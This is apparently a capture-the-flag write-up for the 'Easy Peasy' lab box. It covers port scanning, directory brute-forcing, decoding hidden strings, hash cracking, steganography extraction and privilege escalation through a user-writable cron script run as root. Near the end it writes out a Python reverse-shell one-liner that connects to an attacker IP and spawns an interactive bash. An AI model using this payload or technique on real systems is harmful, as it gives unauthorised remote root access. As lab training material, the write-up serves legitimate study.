Easy Peasy

Port 80 enumeration - Port 65524 enumeration - Stegnography - Encryptions - CronJob PrivEsc

Initial Compromise

  • Running a simple Nmap scan is not enough to detect all open ports since 2 services are not part of the standard ports. You’ll need to run Nmap with the -p- flag to discover the 3 running services

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.16.1
6498/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65524/tcp open  http    Apache httpd 2.4.43 ((Ubuntu))

  • Using gobuster against the Nginx service running on port 80/tcp allows the discovery of a /hidden directory

kali@kali:/data/Easy_Peasy/files$ gobuster dir -u http://10.10.105.32 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.105.32
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/24 10:08:01 Starting gobuster
===============================================================
/hidden (Status: 301)

  • Further enumerating this directory leads to a /hidden/whatever/ location

  • The analysis of the source code reveals a hidden paragraph with an encoded string

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32/hidden/whatever/
<!DOCTYPE html>
<html>
<head>
<title>dead end</title>
<style>
    body {
    background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg");
    background-repeat: no-repeat;
    background-size: cover;
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<center>
<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>
</center>
</body>
</html>

  • The string is base64 encoded

$ echo -n "ZmxhZ3tmMXJzN19mbDRnfQ==" | base64 -d
flag{REDACTED}

Apache Enumeration

  • Simply visiting the /robots.txt page gives us

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/robots.txt
User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a18672860d0510e5ab6699730763b250
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions

  • One of which is we'll have to change the User-Agent to a18672860d0510e5ab6699730763b250 to get further

  • And the second one is the User-Agent looks fishy, maybe it's md5 hash - Yes it is the flag 2 :)

  • The main page shows a standard Apache page, but hints have been hidden in the source code of that page

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/ | grep flag
          <a href="#flag">hi</a>
                           Fl4g 3 : flag{REDACTED}

  • Still in the source code of the main page, we can find a hidden paragraph with an encoded string

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/ | grep hidden
    <p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>

  • It decodes to /n0th1ng3ls3m4tt3r with base62

  • Browsing the location gathered previously reveals a hash gives us

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/n0th1ng3ls3m4tt3r/
<html>
<head>
<title>random title</title>
<style>
    body {
    background-image: url("https://cdn.pixabay.com/photo/2018/01/26/21/20/matrix-3109795_960_720.jpg");
    background-color:black;


    }
</style>
</head>
<body>
<center>
<img src="binarycodepixabay.jpg" width="140px" height="140px"/>
<p>940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81</p>
</center>
</body>
</html>

  • Let’s crack this hash with John the Ripper using the wordlist provided in the challenge easypeasy.txt

kali@kali:/data/Easy_Peasy/files$ echo "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" > hash.txt
kali@kali:/data/Easy_Peasy/files$ /data/src/john/run/john --wordlist=easypeasy.txt --format=GOST hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mypasswordforthatjob (?)
1g 0:00:00:00 DONE (2020-08-24 11:27) 5.555g/s 22755p/s 22755c/s 22755C/s mypasswordforthatjob..flash88
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

  • The page found just previously also contains a jpg file. Let’s download the picture and decrypt the secret with steghide using the password cracked just before (mypasswordforthatjob)

kali@kali:/data/Easy_Peasy/files$ wget http://10.10.105.32:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg
kali@kali:/data/Easy_Peasy/files$ steghide extract -sf binarycodepixabay.jpg 
Enter passphrase: 
wrote extracted data to "secrettext.txt".
kali@kali:/data/Easy_Peasy/files$ cat secrettext.txt 
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

  • This file gives us a username (boring) and a binary encoded password, which decodes to iconvertedmypasswordtobinary - We can now SSH and get a shell on the box :)

Privilege Escalation

  • The user is not in the sudoers but there is a cron job executed by root

boring@kral4-PC:~$ sudo -l
[sudo] password for boring: 
Sorry, user boring may not run sudo on kral4-PC.

boring@kral4-PC:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh

  • The file is owned by our user, we can modify it

boring@kral4-PC:~$ ls -l /var/www/.mysecretcronjob.sh 
-rwxr-xr-x 1 boring boring 33 Jun 14 22:43 /var/www/.mysecretcronjob.sh

boring@kral4-PC:~$ cat /var/www/.mysecretcronjob.sh 
#!/bin/bash
# i will run as root

boring@kral4-PC:/var/www$ cat .mysecretcronjob.sh 
#!/bin/bash
# i will run as root
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

  • Start a listener and get R00T :)

PreviousTeamNextCmesS

Last updated